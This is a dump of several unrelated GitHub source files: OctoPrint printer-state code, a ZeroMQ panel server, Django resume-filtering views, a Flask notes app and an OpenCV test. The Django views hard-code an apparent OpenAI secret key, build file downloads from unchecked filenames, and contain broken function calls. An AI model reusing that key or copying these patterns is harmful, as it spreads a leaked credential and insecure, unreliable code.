payload.get(\"user\"),\n )\n )\n\n if not suppress_script:\n self.script(\n \"afterPrintCancelled\",\n context={\"event\": payload},\n part_of_job=True,\n must_be_set=False,\n )\n\n payload[\"reason\"] = \"cancelled\"\n\n def finalize():\n self._fileManager.log_print(\n payload[\"origin\"],\n payload[\"path\"],\n time.time(),\n payload[\"time\"],\n False,\n self._printerProfileManager.get_current_or_default()[\"id\"],\n )\n eventManager().fire(Events.PRINT_FAILED, payload)\n\n thread = threading.Thread(target=finalize)\n thread.daemon = True\n thread.start()\n\n def on_comm_print_job_paused(self, suppress_script=False, user=None):\n payload = self._payload_for_print_job_event(\n position=self._comm.pause_position.as_dict()\n if self._comm and self._comm.pause_position and not suppress_script\n else None,\n action_user=user,\n )\n if payload:\n eventManager().fire(Events.PRINT_PAUSED, payload)\n self._logger_job.info(\n \"Print job paused - origin: {}, path: {}, owner: {}, user: {}\".format(\n payload.get(\"origin\"),\n payload.get(\"path\"),\n payload.get(\"owner\"),\n payload.get(\"user\"),\n )\n )\n eventManager().fire(\n Events.CHART_MARKED,\n {\"type\": \"pause\", \"label\": \"Pause\"},\n )\n if not suppress_script:\n self.script(\n \"afterPrintPaused\",\n context={\"event\": payload},\n part_of_job=True,\n must_be_set=False,\n )\n\n def on_comm_print_job_resumed(self, suppress_script=False, user=None):\n payload = self._payload_for_print_job_event(action_user=user)\n if payload:\n eventManager().fire(Events.PRINT_RESUMED, payload)\n eventManager().fire(\n Events.CHART_MARKED,\n {\"type\": \"resume\", \"label\": \"Resume\"},\n )\n self._logger_job.info(\n \"Print job resumed - origin: {}, path: {}, owner: {}, user: {}\".format(\n payload.get(\"origin\"),\n payload.get(\"path\"),\n payload.get(\"owner\"),\n payload.get(\"user\"),\n )\n )\n\n if not suppress_script:\n self.script(\n \"beforePrintResumed\",\n context={\"event\": payload},\n part_of_job=True,\n must_be_set=False,\n )\n\n def on_comm_file_transfer_started(\n self, local_filename, remote_filename, filesize, user=None\n ):\n eventManager().fire(\n Events.TRANSFER_STARTED, {\"local\": local_filename, \"remote\": remote_filename}\n )\n\n self._sdStreaming = True\n\n self._setJobData(remote_filename, filesize, True, user=user)\n self._updateProgressData(completion=0.0, filepos=0, printTime=0)\n self._stateMonitor.set_state(\n self._dict(\n text=self.get_state_string(),\n flags=self._getStateFlags(),\n error=self.get_error(),\n )\n )\n\n def on_comm_file_transfer_done(\n self, local_filename, remote_filename, elapsed, failed=False\n ):\n self._sdStreaming = False\n\n payload = {\"local\": local_filename, \"remote\": remote_filename, \"time\": elapsed}\n\n if failed:\n eventManager().fire(Events.TRANSFER_FAILED, payload)\n if callable(self._streamingFailedCallback):\n self._streamingFailedCallback(\n remote_filename, remote_filename, FileDestinations.SDCARD\n )\n else:\n eventManager().fire(Events.TRANSFER_DONE, payload)\n if callable(self._streamingFinishedCallback):\n self._streamingFinishedCallback(\n remote_filename, remote_filename, FileDestinations.SDCARD\n )\n\n self._setCurrentZ(None)\n self._setJobData(None, None, None)\n self._updateProgressData()\n self._stateMonitor.set_state(\n self._dict(\n text=self.get_state_string(),\n flags=self._getStateFlags(),\n error=self.get_error(),\n )\n )\n\n def on_comm_file_transfer_failed(self, local_filename, remote_filename, elapsed):\n self.on_comm_file_transfer_done(\n local_filename, remote_filename, elapsed, failed=True\n )\n\n def on_comm_force_disconnect(self):\n self.disconnect()\n\n def on_comm_record_fileposition(self, origin, name, pos):\n try:\n self._fileManager.save_recovery_data(origin, name, pos)\n except NoSuchStorage:\n pass\n except Exception:\n self._logger.exception(\"Error while trying to persist print recovery data\")\n\n def on_comm_firmware_info(self, firmware_name, firmware_data):\n self._firmware_info = {\"name\": firmware_name, \"data\": firmware_data}\n\n def _payload_for_print_job_event(\n self,\n location=None,\n print_job_file=None,\n print_job_size=None,\n print_job_user=None,\n position=None,\n action_user=None,\n ):\n if print_job_file is None:\n with self._selectedFileMutex:\n selected_file = self._selectedFile\n if not selected_file:\n return {}\n\n print_job_file = selected_file.get(\"filename\", None)\n print_job_size = selected_file.get(\"filesize\", None)\n print_job_user = selected_file.get(\"user\", None)\n location = (\n FileDestinations.SDCARD\n if selected_file.get(\"sd\", False)\n else FileDestinations.LOCAL\n )\n\n if not print_job_file or not location:\n return {}\n\n if location == FileDestinations.SDCARD:\n full_path = print_job_file\n if full_path.startswith(\"/\"):\n full_path = full_path[1:]\n name = path = full_path\n origin = FileDestinations.SDCARD\n\n else:\n full_path = self._fileManager.path_on_disk(\n FileDestinations.LOCAL, print_job_file\n )\n path = self._fileManager.path_in_storage(\n FileDestinations.LOCAL, print_job_file\n )\n _, name = self._fileManager.split_path(FileDestinations.LOCAL, path)\n origin = FileDestinations.LOCAL\n\n result = {\"name\": name, \"path\": path, \"origin\": origin, \"size\": print_job_size}\n\n if position is not None:\n result[\"position\"] = position\n\n if print_job_user is not None:\n result[\"owner\"] = print_job_user\n\n if action_user is not None:\n result[\"user\"] = action_user\n\n return result\n\n\nclass StateMonitor:\n def __init__(\n self,\n interval=0.5,\n on_update=None,\n on_add_temperature=None,\n on_add_log=None,\n on_add_message=None,\n on_get_progress=None,\n on_get_resends=None,\n ):\n self._interval = interval\n self._update_callback = on_update\n self._on_add_temperature = on_add_temperature\n self._on_add_log = on_add_log\n self._on_add_message = on_add_message\n self._on_get_progress = on_get_progress\n self._on_get_resends = on_get_resends\n\n self._state = None\n self._job_data = None\n self._current_z = None\n self._offsets = {}\n self._progress = None\n self._resends = None\n\n self._progress_dirty = False\n self._resends_dirty = False\n\n self._change_event = threading.Event()\n self._state_lock = threading.Lock()\n self._progress_lock = threading.Lock()\n self._resends_lock = threading.Lock()\n\n self._last_update = time.monotonic()\n self._worker = threading.Thread(target=self._work)\n self._worker.daemon = True\n self._worker.start()\n\n def _get_current_progress(self):\n if callable(self._on_get_progress):\n return self._on_get_progress()\n return self._progress\n\n def _get_current_resends(self):\n if callable(self._on_get_resends):\n return self._on_get_resends()\n return self._resends\n\n def reset(\n self,\n state=None,\n job_data=None,\n progress=None,\n current_z=None,\n offsets=None,\n resends=None,\n ):\n self.set_state(state)\n self.set_job_data(job_data)\n self.set_progress(progress)\n self.set_current_z(current_z)\n self.set_temp_offsets(offsets)\n self.set_resends(resends)\n\n def add_temperature(self, temperature):\n self._on_add_temperature(temperature)\n self._change_event.set()\n\n def add_log(self, log):\n self._on_add_log(log)\n with self._resends_lock:\n self._resends_dirty = True\n self._change_event.set()\n\n def add_message(self, message):\n self._on_add_message(message)\n self._change_event.set()\n\n def set_current_z(self, current_z):\n self._current_z = current_z\n self._change_event.set()\n\n def set_state(self, state):\n with self._state_lock:\n self._state = state\n self._change_event.set()\n\n def set_job_data(self, job_data):\n self._job_data = job_data\n self._change_event.set()\n\n def trigger_progress_update(self):\n with self._progress_lock:\n self._progress_dirty = True\n self._change_event.set()\n\n def set_progress(self, progress):\n with self._progress_lock:\n self._progress_dirty = False\n self._progress = progress\n self._change_event.set()\n\n def set_resends(self, resend_ratio):\n with self._resends_lock:\n self._resends_dirty = False\n self._resends = resend_ratio\n self._change_event.set()\n\n def set_temp_offsets(self, offsets):\n if offsets is None:\n offsets = {}\n self._offsets = offsets\n self._change_event.set()\n\n def _work(self):\n try:\n while True:\n self._change_event.wait()\n\n now = time.monotonic()\n delta = now - self._last_update\n additional_wait_time = self._interval - delta\n if additional_wait_time > 0:\n time.sleep(additional_wait_time)\n\n with self._state_lock:\n data = self.get_current_data()\n self._update_callback(data)\n self._last_update = time.monotonic()\n self._change_event.clear()\n except Exception:\n logging.getLogger(__name__).exception(\n \"Looks like something crashed inside the state update worker. \"\n \"Please report this on the OctoPrint issue tracker (make sure \"\n \"to include logs!)\"\n )\n\n def get_current_data(self):\n with self._progress_lock:\n if self._progress_dirty:\n self._progress = self._get_current_progress()\n self._progress_dirty = False\n\n with self._resends_lock:\n if self._resends_dirty:\n self._resends = self._get_current_resends()\n self._resends_dirty = False\n\n return {\n \"state\": self._state,\n \"job\": self._job_data,\n \"currentZ\": self._current_z,\n \"progress\": self._progress,\n \"offsets\": self._offsets,\n \"resends\": self._resends,\n }\n\n\nclass DataHistory(InvariantContainer):\n def __init__(self, cutoff=30 * 60):\n def data_invariant(data):\n data.sort(key=lambda x: x[\"time\"])\n now = int(time.time())\n return [item for item in data if item[\"time\"] >= now - cutoff]\n\n InvariantContainer.__init__(self, guarantee_invariant=data_invariant)\n self._last = None\n\n @property\n def last(self):\n return self._last\n\n def append(self, item):\n try:\n return super().append(item)\n finally:\n self._last = self._data[-1] if len(self._data) else None\n","repo_name":"OctoPrint/OctoPrint","sub_path":"src/octoprint/printer/standard.py","file_name":"standard.py","file_ext":"py","file_size_in_byte":75213,"program_lang":"python","lang":"en","doc_type":"code","stars":7739,"dataset":"github-code","pt":"96"} +{"seq_id":"23182836800","text":"import io\nimport syslog\nimport zmq\n\n\nclass SocketBinding:\n def __init__(self, panel):\n self.panel = panel\n self.bind()\n\n def bind(self):\n self.context = zmq.Context()\n self.socket = self.context.socket(zmq.REP)\n self.socket.bind(\"tcp://*:5555\")\n\n while True:\n try:\n message = self.socket.recv()\n if message == b\"UUDDLRLRBA\":\n self.panel.clear()\n else:\n self.panel.draw(io.BytesIO(message))\n self.socket.send(b\"1\")\n except Exception as e:\n syslog.syslog(syslog.LOG_ERR, str(e))\n print(e)\n try:\n self.socket.send(b\"0\")\n except:\n pass\n","repo_name":"fspoettel/thirtytwopixels","sub_path":"server/socket_binding.py","file_name":"socket_binding.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"96"} +{"seq_id":"10084850203","text":"from django.shortcuts import render\r\nfrom django.template import loader\r\nfrom django.http import HttpResponse\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom django.http import FileResponse\r\nimport openai\r\nimport re\r\nimport requests\r\nimport os\r\nimport docx\r\nfrom bs4 import BeautifulSoup\r\nfrom docx import Document\r\nfrom django.http import Http404\r\n\r\n# Create your views here.\r\ndef main(request):\r\n template = loader.get_template('index.html')\r\n return HttpResponse(template.render())\r\n# def jobseeker(request):\r\n# template = loader.get_template('jobseeker.html')\r\n# return HttpResponse(template.render(request))\r\ndef jobseeker(request):\r\n return render(request,'jobseeker.html')\r\ndef resume(request):\r\n return render(request,'resumefinder.html')\r\n\r\n# def scrape_jobs():\r\n# url = 'https://www.freshersworld.com/jobs/jobsearch/python-jobs-in-hyderabad?experience=12'\r\n# response = requests.get(url)\r\n# soup = BeautifulSoup(response.content, 'html.parser')\r\n\r\n# job_listings = []\r\n\r\n# # Find the HTML elements containing job information\r\n# job_elements = soup.find_all('div', class_='job-container')\r\n# print(job_elements)\r\n\r\n# for job_element in job_elements:\r\n# # Extract job details\r\n# job_title = job_elements.find('span', class_='wrap-title').text\r\n# company_name = job_elements.find('h3', class_='latest-jobs-title font-16 margin-none inline-block company-name').text\r\n# job_location = job_elements.find('span', class_='job-location display-block modal-open job-details-span').text\r\n# qualifications = job_elements.find('span', class_='qualifications display-block modal-open pull-left job-details-span').text\r\n \r\n# apply = job_element.find('a', class_='apply-now').text.strip()\r\n# link = job_element.find('a', class_='list-job-link')['href']\r\n\r\n# # Add job details to the list\r\n# job_listings.append({\r\n# 'title': job_title,\r\n# 'location': job_location,\r\n# 'qualification': qualifications,\r\n# 'apply': apply,\r\n# 'link': link\r\n# })\r\n# print(job_listings)\r\n\r\n# return job_listings\r\n \r\n# def job_search(request):\r\n# if request.method == 'POST':\r\n# description = request.POST.get('description', '')\r\n# print(\"Search Description:\", description)\r\n# # Call the scrape_jobs() function to get the job listings\r\n# job_listings = scrape_jobs()\r\n\r\n# return render(request, 'jobseeker.html', {'job_listings': job_listings,'description':description})\r\n\r\n# return render(request, 'jobseeker.html')\r\ndef get_resume_names(folder_path):\r\n resume_names = [doc for doc in os.listdir(folder_path) if doc.endswith(('.txt', '.pdf', '.docx')) and not doc.startswith('~$')]\r\n return resume_names\r\nopenai.api_key = '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'\r\n\r\ndef filtered_files(request,technologies, experience):\r\n \r\n if request.method == 'POST':\r\n technologies = request.POST.get('technologies')\r\n experience = request.POST.get('experience')\r\n \r\n \r\n \r\n description=' '\r\n response = openai.Completion.create(\r\n engine=\"text-davinci-003\",\r\n prompt=f\"Summarize the enter description in a short form and get the technologies:\\n{description}\\n\",\r\n temperature=0.5,\r\n max_tokens=100,\r\n n=1,\r\n stop=None,\r\n timeout=10,\r\n )\r\n\r\n summary = response.choices[0].text.strip()\r\n lemmatizer = WordNetLemmatizer()\r\n\r\n lemmatized_words = [lemmatizer.lemmatize(word) for word in summary]\r\n # print(lemmatized_words)\r\n # print(summary)\r\n stop_words =stopwords.words(\"english\")\r\n stop_words.extend(['.',\",\",\":\",\")\",\",\",\"software\",\"(\",\"want\",\"person\",\"knowledge\",\"skills\",\"percent\",\"years\",\"year\",\"different\",\"some\", \"experience\",\"expertise\",\"technology\",\"technologies\", \"get\", \"must\",\"resume\",\"resumes\",\"developer\", \"latest\",\"engineer\",\"exp\",\"yrs\",\";\",\"tech\",\"experience\"])\r\n folder_path = \"C:/Users/singl/OneDrive/Desktop/docs\"\r\n \r\n \r\n matching_files = []\r\n matching_files1 = []\r\n matching_files2 = []\r\n files = os.listdir(folder_path)\r\n for file in files:\r\n if file.endswith('.docx'):\r\n document = Document(os.path.join(folder_path, file))\r\n\r\n text = \"\\n\".join([paragraph.text for paragraph in document.paragraphs])\r\n text = text.lower()\r\n\r\n \r\n pattern = r\"(?i)(?:(\\d+(?:\\.\\d+)?|\\d+\\+?)\\s*(?:years|yrs|yr.|years of experience))|(?:\\b(\\w+)\\s+years\\s+of\\s+experience\\b)\"\r\n \r\n matches = re.findall(pattern, text)\r\n \r\n numeric_matches = [match[0] for match in matches if match[0]]\r\n word_matches = [match[1] for match in matches if match[1]]\r\n \r\n totals = numeric_matches + word_matches\r\n\r\n print(totals)\r\n\r\n\r\n summary_pattern = r\"(?i)(?:(\\d+(?:\\.\\d+)?|\\d+\\+?)\\s*(?:years|yrs|yr.|years of experience))|(?:\\b(\\w+)\\s+years\\s+of\\s+experience\\b)\"\r\n\r\n matches = re.findall(summary_pattern, description)\r\n \r\n \r\n numeric_matches1 = [match[0] for match in matches if match[0]]\r\n word_matches1 = [match[1] for match in matches if match[1]]\r\n \r\n sum_totals = numeric_matches1 + word_matches1\r\n\r\n print(sum_totals)\r\n\r\n\r\n state = \"\"\r\n for sum_total in sum_totals:\r\n for total in totals:\r\n if sum_total in total:\r\n state = str(\"Experience {} years match \" .format(total))\r\n print(state)\r\n \r\n\r\n tokens = word_tokenize(summary.lower())\r\n filtered_words = []\r\n for token in tokens:\r\n if token not in stop_words:\r\n filtered_words.append(token)\r\n print(filtered_words)\r\n num_keywords = len(filtered_words)\r\n matching_keywords = []\r\n for word in filtered_words:\r\n if word in text:\r\n matching_keywords.append(word)\r\n\r\n\r\n\r\n matching_keywords1 = len(matching_keywords)\r\n print(matching_keywords)\r\n matching_percentage = matching_keywords1 / num_keywords * 100\r\n print(matching_percentage)\r\n matching = []\r\n\r\n if matching_percentage>=1:\r\n\r\n if matching_percentage >= 75:\r\n matching_files.append((file, matching_percentage,matching_keywords,state))\r\n elif matching_percentage>=50 and matching_percentage<75:\r\n matching_files1.append((file, matching_percentage,matching_keywords,state))\r\n elif matching_percentage>=1 and matching_percentage<50:\r\n # else:\r\n matching_files2.append((file, matching_percentage,matching_keywords,state)) \r\n else:\r\n print(\"No Files Found\")\r\n\r\n else:\r\n print(\"No Files Found\")\r\n \r\n sorted_files1 = sorted(matching_files, key=lambda x: x[1], reverse=True)\r\n \r\n sorted_files2 = sorted(matching_files1, key=lambda x: x[1], reverse=True)\r\n \r\n sorted_files3 = sorted(matching_files2, key=lambda x: x[1], reverse=True)\r\n \r\n filtered_files=[]\r\n folder_path = \"C:/Users/sp13/OneDrive/Desktop/docs/\"\r\n\r\n for file_info in sorted_files1:\r\n file_name = file_info[0]\r\n file_path = folder_path + file_name\r\n filtered_files.append(file_path)\r\n\r\n print(\"filtered_files with sorted_files1 start\")\r\n print(filtered_files)\r\n print(\"filtered_files with sorted_files1 end\")\r\n\r\n\r\n\r\n\r\n filtered_files1=[]\r\n folder_path = \"C:/Users/sp13/OneDrive/Desktop/docs/\"\r\n\r\n for file_info in sorted_files2:\r\n file_name = file_info[0]\r\n file_path = folder_path + file_name\r\n filtered_files1.append(file_path)\r\n\r\n print(\"filtered_files1 with sorted_files2 start\")\r\n print(filtered_files1)\r\n print(\"filtered_files1 with sorted_files2 end\")\r\n\r\n filtered_files2=[]\r\n folder_path = \"C:/Users/singl/OneDrive/Desktop/docs\"\r\n\r\n for file_info in sorted_files3:\r\n file_name = file_info[0]\r\n file_path = folder_path + file_name\r\n filtered_files2.append(file_path)\r\n filtered_files = [os.path.basename(file) for file in filtered_files]\r\n filtered_files1 = [os.path.basename(file) for file in filtered_files1]\r\n filtered_files2 = [os.path.basename(file) for file in filtered_files2]\r\n # filtered_files = [file for file in filtered_files]\r\n # filtered_files1 = [file for file in filtered_files1]\r\n # filtered_files2 = [file for file in filtered_files2]\r\n # filtered_files = [os.path.relpath(file, settings.MEDIA_ROOT) for file in filtered_files]\r\n\r\n print(\"filtered_files2 with sorted_files3 start\")\r\n print(filtered_files2)\r\n print(\"filtered_files2 with sorted_files3 start\")\r\n \r\n\r\n matching_files_str = \"\\n\".join([f\"{file} {percentage:.2f}% with Matching Keywords {matching_keywords} {state} \" for file, percentage,matching_keywords,state in sorted_files1])\r\n matching_files_str1 = \"\\n\".join([f\"{file} {percentage:.2f}% with Matching Keywords {matching_keywords} {state}\" for file, percentage,matching_keywords,state in sorted_files2])\r\n matching_files_str2 = \"\\n\".join([f\"{file} {percentage:.2f}% with Matching Keywords {matching_keywords} {state}\" for file, percentage,matching_keywords,state in sorted_files3])\r\n \r\n\r\n count = len(matching_files + matching_files1 + matching_files2)\r\n\r\n print(f\" {count} files were filtered \".format(count))\r\n \r\n context = {\r\n 'count': count,\r\n 'filtered_files': filtered_files,\r\n 'matching_files_str': matching_files_str,\r\n 'filtered_files1': filtered_files1,\r\n 'matching_files_Str1':matching_files_str1,\r\n 'filtered_files2': filtered_files2,\r\n 'matching_files_str2':matching_files_str2,\r\n }\r\n print(f\"{count} files were filtered\")\r\n # return count,filtered_files,matching_files_str,filtered_files1,matching_files_str1,filtered_files2,matching_files_str2\r\n\r\n return render(request, 'resumefinder.html', context,experience,technologies)\r\n \r\n \r\n \r\n# from django.http import HttpResponse\r\n# import os\r\n# from django.http import HttpResponse, FileResponse\r\n# from django.conf import settings\r\n# def download_file(request, filename):\r\n# file_path = os.path.join('C:/Users/sp13/OneDrive/Desktop/Resumes/', filename) # Replace 'path_to_folder' with the actual folder path\r\n# if os.path.exists(file_path):\r\n# with open(file_path, 'rb') as file:\r\n# response = HttpResponse(file.read(), content_type='application/docx')\r\n# response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(file_path)\r\n# return response\r\n# else:\r\n# raise Http404(\"File does not exist\")\r\n\r\n\r\n\r\n\r\n \r\n #return count,filtered_files,matching_files_str,filtered_files1,matching_files_str1,filtered_files2,matching_files_str2\r\n# def download_file(request, filename):\r\n# file_path = f\"C:/Users/sp13/OneDrive/Desktop/Resumes/{filename}\" # Update the file path based on your actual directory\r\n\r\n# try:\r\n# with open(file_path, 'rb') as file:\r\n# response = FileResponse(file)\r\n# response['Content-Disposition'] = f'attachment; filename=\"{filename}\"'\r\n# return response\r\n# except FileNotFoundError:\r\n# raise Http404(\"File does not exist\") \r\n\r\n# from django.http import FileResponse, Http404\r\n# import os\r\n\r\n# def download_file(request, filename):\r\n# file_path = os.path.join('C:/Users/singl/OneDrive/Desktop/Resumes/', filename) # Update with the actual folder path\r\n\r\n# if os.path.exists(file_path):\r\n# with open(file_path, 'rb') as file:\r\n# response = FileResponse(file)\r\n# response['Content-Disposition'] = f'attachment; filename=\"{filename}\"'\r\n# return response\r\n\r\n# return render(request, 'resumefinder.html')\r\nimport mimetypes\r\nimport zipfile\r\ndef download_file(request, filename):\r\n folder_path = 'C:/Users/singl/OneDrive/Desktop/docs/' # Replace with the actual folder path\r\n file_path = os.path.join(folder_path, filename)\r\n\r\n if os.path.isfile(file_path):\r\n fl = open(file_path, 'rb')\r\n mime_type, _ = mimetypes.guess_type(file_path)\r\n response = HttpResponse(fl, content_type=mime_type)\r\n response['Content-Disposition'] = f\"attachment; filename={filename}\"\r\n return response\r\n else:\r\n raise Http404(\"File does not exist\")\r\n\r\n# def download_files(request):\r\n# folder_path = 'C:/Users/singl/OneDrive/Desktop/Resumes/' # Replace with the actual folder path\r\n# files = request.POST.getlist('files') # Assuming you have a list of selected files from the form\r\n\r\n# zip_path = os.path.join(folder_path, 'download.zip')\r\n# zip_file = zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED)\r\n\r\n# for filename in files:\r\n# file_path = os.path.join(folder_path, filename)\r\n# if os.path.isfile(file_path):\r\n# zip_file.write(file_path, os.path.basename(file_path))\r\n\r\n# zip_file.close()\r\n\r\n# if os.path.isfile(zip_path):\r\n# fl = open(zip_path, 'rb')\r\n# mime_type, _ = mimetypes.guess_type(zip_path)\r\n# response = HttpResponse(fl, content_type=mime_type)\r\n# response['Content-Disposition'] = 'attachment; filename=\"download.zip\"'\r\n# return response\r\n# else:\r\n# raise Http404(\"No files selected or does not exist\")\r\n\r\n# def search1(request):\r\n# if request.method == 'POST':\r\n# description = request.POST.get('description1')\r\n# def filtered_files(request):\r\n \r\n \r\n# response = openai.Completion.create(\r\n# engine=\"text-davinci-003\",\r\n# prompt=f\"Summarize the enter description in a short form and get the technologies:\\n{description}\\n\",\r\n# temperature=0.5,\r\n# max_tokens=100,\r\n# n=1,\r\n# stop=None,\r\n# timeout=10,\r\n# )\r\n\r\n# summary = response.choices[0].text.strip()\r\n# lemmatizer = WordNetLemmatizer()\r\n\r\n# lemmatized_words = [lemmatizer.lemmatize(word) for word in summary]\r\n# # print(lemmatized_words)\r\n# # print(summary)\r\n# stop_words =stopwords.words(\"english\")\r\n# stop_words.extend(['.',\",\",\":\",\")\",\",\",\"software\",\"(\",\"want\",\"person\",\"knowledge\",\"skills\",\"percent\",\"years\",\"year\",\"different\",\"some\", \"experience\",\"expertise\",\"technology\",\"technologies\", \"get\", \"must\",\"resume\",\"resumes\",\"developer\", \"latest\",\"engineer\",\"exp\",\"yrs\",\";\",\"tech\",\"experience\"])\r\n# folder_path = \"C:/Users/singl/OneDrive/Desktop/docs\"\r\n \r\n \r\n# matching_files = []\r\n# matching_files1 = []\r\n# matching_files2 = []\r\n# files = os.listdir(folder_path)\r\n# for file in files:\r\n# if file.endswith('.docx'):\r\n# document = Document(os.path.join(folder_path, file))\r\n\r\n# text = \"\\n\".join([paragraph.text for paragraph in document.paragraphs])\r\n# text = text.lower()\r\n \r\n# return render(request, 'results.html', {'description': description, })\r\n# return render(request,'resumefinder.html')\r\n# def searches(technologies, experience):\r\n# lemmatizer = WordNetLemmatizer()\r\n# folder_path = \"C:/Users/sp13/OneDrive/Desktop/docs\"\r\n\r\n# matching_files = []\r\n \r\n# files = os.listdir(folder_path)\r\n# for file in files:\r\n# if file.endswith('.docx'):\r\n# document = Document(os.path.join(folder_path, file))\r\n\r\n# text = \"\\n\".join([paragraph.text for paragraph in document.paragraphs])\r\n# text = text.lower()\r\n\r\n# # Perform filtering based on technologies\r\n# technologies_list = technologies.split(',')\r\n# for tech in technologies_list:\r\n# if tech.strip().lower() in text:\r\n# matching_files.append(file)\r\n# break\r\n\r\n# # Perform filtering based on experience\r\n# pattern = r\"(?i)(?:(\\d+(?:\\.\\d+)?|\\d+\\+?)\\s*(?:years|yrs|yr.|years of experience))|(?:\\b(\\w+)\\s+years\\s+of\\s+experience\\b)\"\r\n# matches = re.findall(pattern, text)\r\n# numeric_matches = [match[0] for match in matches if match[0]]\r\n# word_matches = [match[1] for match in matches if match[1]]\r\n# totals = numeric_matches + word_matches\r\n\r\n# for total in totals:\r\n# if experience.strip().lower() in total.lower():\r\n# matching_files.append(file)\r\n# break\r\n\r\n# return matching_files\r\n\r\ndef search_resumes(request):\r\n if request.method == 'GET':\r\n technologies = request.GET.get('technologies', '')\r\n experience = request.GET.get('experience', '')\r\n param1 = request.GET.get('param1', '')\r\n param2 = request.GET.get('param2', '')\r\n\r\n count, filtered_files, matching_files_str, filtered_files1, matching_files_str1, filtered_files2, matching_files_str2 = filtered_files(technologies, experience, param1, param2)\r\n\r\n context = {\r\n 'count': count,\r\n 'filtered_files': filtered_files,\r\n 'matching_files_str': matching_files_str,\r\n 'filtered_files1': filtered_files1,\r\n 'matching_files_str1': matching_files_str1,\r\n 'filtered_files2': filtered_files2,\r\n 'matching_files_str2': matching_files_str2,\r\n 'technologies': technologies,\r\n 'experience': experience,\r\n 'param1': param1,\r\n 'param2': param2\r\n }\r\n\r\n return render(request, 'search_results.html', context)\r\n \r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"saziya19/hiregenai","sub_path":"employees/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"35167141933","text":"from flask import Flask, redirect, render_template, request\nfrom flask_heroku import Heroku\nfrom flask_sqlalchemy import SQLAlchemy\nimport datetime as dt\nimport logging\n\n# Initialize Heroku app and database connection\nlogging.basicConfig(level=logging.DEBUG)\n\napp = Flask(__name__)\nheroku = Heroku(app)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False # Supress warning\ndb = SQLAlchemy(app)\n\napp.debug = True\n\n\n# SQLAlchemy Database entities\n# (each class corresponds to a database table and each instance to a table row)\nclass Note(db.Model):\n '''ORM mapping of the Note entity'''\n\n # Each attribute is a table column\n # These attributes are created automatically\n id = db.Column(db.Integer, primary_key=True)\n created_at = db.Column(db.DateTime, default=db.func.now(), nullable=False)\n modified_at = db.Column(db.DateTime, default=db.func.now(), nullable=False)\n\n # These attributes should be set manually (default: None)\n title = db.Column(db.String)\n content = db.Column(db.String)\n\n\nclass NoteVersion(db.Model):\n '''ORM mapping of the NoteVersion entity (has to be created manually)'''\n # These attributes are created automatically\n id = db.Column(db.Integer, primary_key=True)\n created_at = db.Column(db.DateTime, default=db.func.now(), nullable=False)\n modified_at = db.Column(db.DateTime, default=db.func.now(), nullable=False)\n\n # These attributes should be set manually (default: None)\n note_id = db.Column(db.Integer, db.ForeignKey(Note.id))\n title = db.Column(db.String)\n content = db.Column(db.String)\n\n # Create a relationship to the parent Note\n note = db.relationship(Note, backref=db.backref('versions', lazy='dynamic'))\n\n\n# Flask URL handlers\n@app.route('/')\ndef index():\n '''Index page'''\n\n # Query all instances of Note from database\n notes = Note.query.all()\n\n # Render index page listing all notes\n return render_template('index.html', notes=notes)\n\n\n@app.route('/note/new')\ndef note_new():\n '''Create a new note'''\n\n # Create a new instance from Note and add it to database\n note = Note()\n db.session.add(note)\n db.session.commit()\n\n # Redirect user to newly created note\n return redirect('/note/%d' % note.id)\n\n\n@app.route('/note/', methods=['GET', 'POST'])\ndef note(note_id):\n '''Open/update an existing note'''\n\n # Retrieve an existing instance from Note by id\n note = Note.query.get_or_404(note_id)\n\n if request.method == 'POST':\n # Save previous version\n version = NoteVersion()\n version.note_id = note.id\n version.title = note.title\n version.content = note.content\n\n # If responding to a POST, update fields from HTML form (if present)\n note.title = request.form.get('title', note.title)\n note.content = request.form.get('content', note.content)\n note.modified_at = dt.datetime.now()\n\n # And commit instance changes to database\n db.session.add(version)\n db.session.add(note)\n db.session.commit()\n\n # Render note page containing an HTML form with instance contents\n return render_template('note.html', note=note)\n\n\n@app.route('/note//versions')\ndef note_versions(note_id):\n '''List previous versions of a note'''\n\n # Retrieve an existing instance from Note by id\n note = Note.query.get_or_404(note_id)\n\n # Render page with a note object containing the versions\n return render_template('note_versions.html', note=note)\n\n\n@app.route('/version/')\ndef note_version(version_id):\n '''Show an existing note version'''\n\n # Retrieve an existing instance from NoteVersion by id\n version = NoteVersion.query.get_or_404(version_id)\n\n # Render page with a note object containing the versions\n return render_template('note_version.html', version=version)\n\n\n# Run app from command-line\nif __name__ == '__main__':\n app.run()\n","repo_name":"divieira/asciimath-notebook","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9041509493","text":"import time\nimport cv2\n\nfrom numpy import array, mean, std\n\nfrom visp.detector import QRCodeDetector\n\nres = 640, 480\n\nif __name__ == '__main__':\n cap = cv2.VideoCapture(0)\n\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, res[0])\n cap.set(cv2.CAP_PROP_FRAME_HEIGHT, res[1])\n\n qr_code_detector = QRCodeDetector()\n\n dt = []\n\n while True:\n success, img = cap.read()\n\n start = time.time()\n qr_codes = qr_code_detector.detect(img)\n end = time.time()\n\n for code in qr_codes:\n code.draw(img)\n\n dt.append(end - start)\n if len(dt) == 20:\n dt = array(dt) * 1000\n print('Average detection time {}ms (STD={})'.format(mean(dt), std(dt)))\n dt = []\n\n cv2.imshow('Live Video', img)\n cv2.waitKey(20)\n","repo_name":"pierre-rouanet/pyvisp","sub_path":"tests/qrcode_detection.py","file_name":"qrcode_detection.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"18500289297","text":"# Import necessary modules\nimport sys\nfrom PySide2.QtGui import *\nfrom PySide2.QtCore import *\nfrom PySide2.QtWidgets import *\n\nclass AnalogClock(QWidget):\n hourHand = QPolygon([\n QPoint(7, 8),\n 